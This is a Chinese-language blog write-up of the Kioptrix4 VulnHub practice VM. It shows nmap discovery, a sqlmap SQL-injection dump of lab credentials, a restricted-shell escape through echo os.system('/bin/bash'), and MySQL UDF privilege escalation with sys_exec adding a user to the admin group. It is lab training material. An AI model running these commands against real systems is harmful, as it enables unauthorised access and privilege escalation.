首页 > 其他分享 >学习笔记-Kioptrix4-WalkThrough

学习笔记-Kioptrix4-WalkThrough

时间:2022-11-03 12:55:50浏览次数:73  
标签:Kioptrix4 提权 -- com 笔记 WalkThrough but mysql root

Kioptrix4-WalkThrough

文章作者 xidaner & r0fus0d


免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.


靶机地址

Description

Again a long delay between VMs, but that cannot be helped. Work, family must come first. Blogs and hobbies are pushed down the list. These things aren’t as easy to make as one may think. Time and some planning must be put into these challenges, to make sure that:

1. It’s possible to get root remotely [ Edit: sorry not what I meant ]

1a. It’s possible to remotely compromise the machine

    Stays within the target audience of this site

    Must be “realistic” (well kinda…)

    Should serve as a refresher for me. Be it PHP or MySQL usage etc. Stuff I haven’t done in a while.

I also had lots of troubles exporting this one. So please take the time to read my comments at the end of this post.

Keeping in the spirit of things, this challenge is a bit different than the others but remains in the realm of the easy. Repeating myself I know, but things must always be made clear: These VMs are for the beginner. It’s a place to start.

I’d would love to code some small custom application for people to exploit. But I’m an administrator not a coder. It would take too much time to learn/code such an application. Not saying I’ll never try doing one, but I wouldn’t hold my breath. If someone wants more difficult challenges, I’m sure the Inter-tubes holds them somewhere. Or you can always enroll in Offsec’s PWB course. *shameless plug

-- A few things I must say. I made this image using a new platform. Hoping everything works but I can’t test for everything. Initially the VM had troubles getting an IP on boot-up. For some reason the NIC wouldn’t go up and the machine was left with the loopback interface. I hope that I fixed the problem. Don’t be surprised if it takes a little moment for this one to boot up. It’s trying to get an IP. Be a bit patient. Someone that tested the image for me also reported the VM hung once powered on. Upon restart all was fine. Just one person reported this, so hoping it’s not a major issue. If you plan on running this on vmFusion, you may need to convert the imagine to suit your fusion version.

-- Also adding the VHD file for download, for those using Hyper-V. You guys may need to change the network adapter to “Legacy Network Adapter”. I’ve test the file and this one seems to run fine for me… If you’re having problems, or it’s not working for any reason email comms[=]kioptrix.com

Thanks to @shai_saint from www.n00bpentesting.com for the much needed testing with various VM solutions.

Thanks to Patrick from Hackfest.ca for also running the VM and reporting a few issues. And Swappage & @Tallenz for doing the same. All help is appreciated guys

So I hope you enjoy this one.

The Kioptrix Team

Source: http://www.kioptrix.com/blog/?p=604

**Note: Just a virtual hard drive. You'll need to create a new virtual machine & attach the existing hard drive**

知识点

  • SQL 注入
  • mysql udf 提权

前期-信息收集

nmap

开机后我们发现 这个用户名和密码是不知道的

在虚拟机中要先接入到和 kali 一个网段中.然后我们要知道这个虚拟机的 ip 地址,就要用到 IP 探活.

nmap -sP <你虚拟机网卡的网段> /24

可以发现网段中一共有 4 个 ip 地址,除去本机和 kali 剩下的就是靶机的 ip 地址


扫描开放端口

nmap 192.168.17.130

可以发现,目标打开了 80 端口

目测可以注入,尝试了简单 payload,下面选择直接跑 sqlmap


中期-漏洞利用

sql注入

代码:

sqlmap -u http://192.168.17.130/checklogin.php
--data="myusername=admin&mypassword=123&Submit=Login" -p mypassword --dump -T members -D members

 id | username | password              |
+----+----------+-----------------------+
| 1  | john     | MyNameIsJohn          |
| 2  | robert   | ADGAdsafdfwt4gadfga== |

后期-拿shell-提权

尝试 SSH 登录

输入用户名和密码登录进去

这里用了 echo 命令获取交互 shell

echo os.system("/bin/bash")
whoami

查看服务器下的文件

cd /var/www/
cat checklogin.php


登录 MYSQL

mysql -u root -p

mysql UDF 提权

在 mysql 中输入

select sys_exec('usermod -a -G admin john');

在我们退出去后,尝试登录到 root

whoami 确认获取 root

提权成功,感谢 Kioptrix Team 制作靶机


补充

扫描 smb

目标开放 139 445 这意味着可能可以枚举用户名

nmap -sC --script smb-enum-users.nse <目标IP>

enum4linux <目标IP>

这2个命令都可以

udf 提权

需要 udf 提权,需要检查 mysql 是否以 root 权限运行

ls -la /usr/lib/lib_mysqludf_sys.so

点击关注,共同学习!
安全狗的自我修养

github haidragon

https://github.com/haidragon

标签:Kioptrix4,提权,--,com,笔记,WalkThrough,but,mysql,root
From: https://www.cnblogs.com/haidragon/p/16854097.html

相关文章

  • 学习笔记-Kioptrix3-WalkThrough
    Kioptrix3-WalkThrough免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.靶机地址https://www.vulnhub......
  • 学习笔记-Kioptrix5-WalkThrough
    Kioptrix5-WalkThrough免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.靶机地址https://www.vulnhub......
  • 学习笔记-xray
    xray免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.项目地址https://github.com/chaitin/xray官......
  • 学习笔记-DC1-WalkThrough
    DC1-WalkThrough免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.靶机地址https://www.vulnhub.com/e......
  • 学习笔记-DC3-WalkThrough
    DC3-WalkThrough免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.靶机地址https://www.vulnhub.com/e......
  • 学习笔记-DC2-WalkThrough
    DC2-WalkThrough免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.靶机地址https://www.vulnhub.com/e......
  • 学习笔记-DC5-WalkThrough
    DC5-WalkThrough免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.靶机地址https://www.vulnhub.com/e......
  • 学习笔记-DC4-WalkThrough
    DC4-WalkThrough免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.靶机地址https://www.vulnhub.com/e......
  • 学习笔记-DC7-WalkThrough
    DC7-WalkThrough免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.靶机地址https://www.vulnhub.com/e......
  • 学习笔记-DC6-WalkThrough
    DC6-WalkThrough免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.靶机地址https://www.vulnhub.com/e......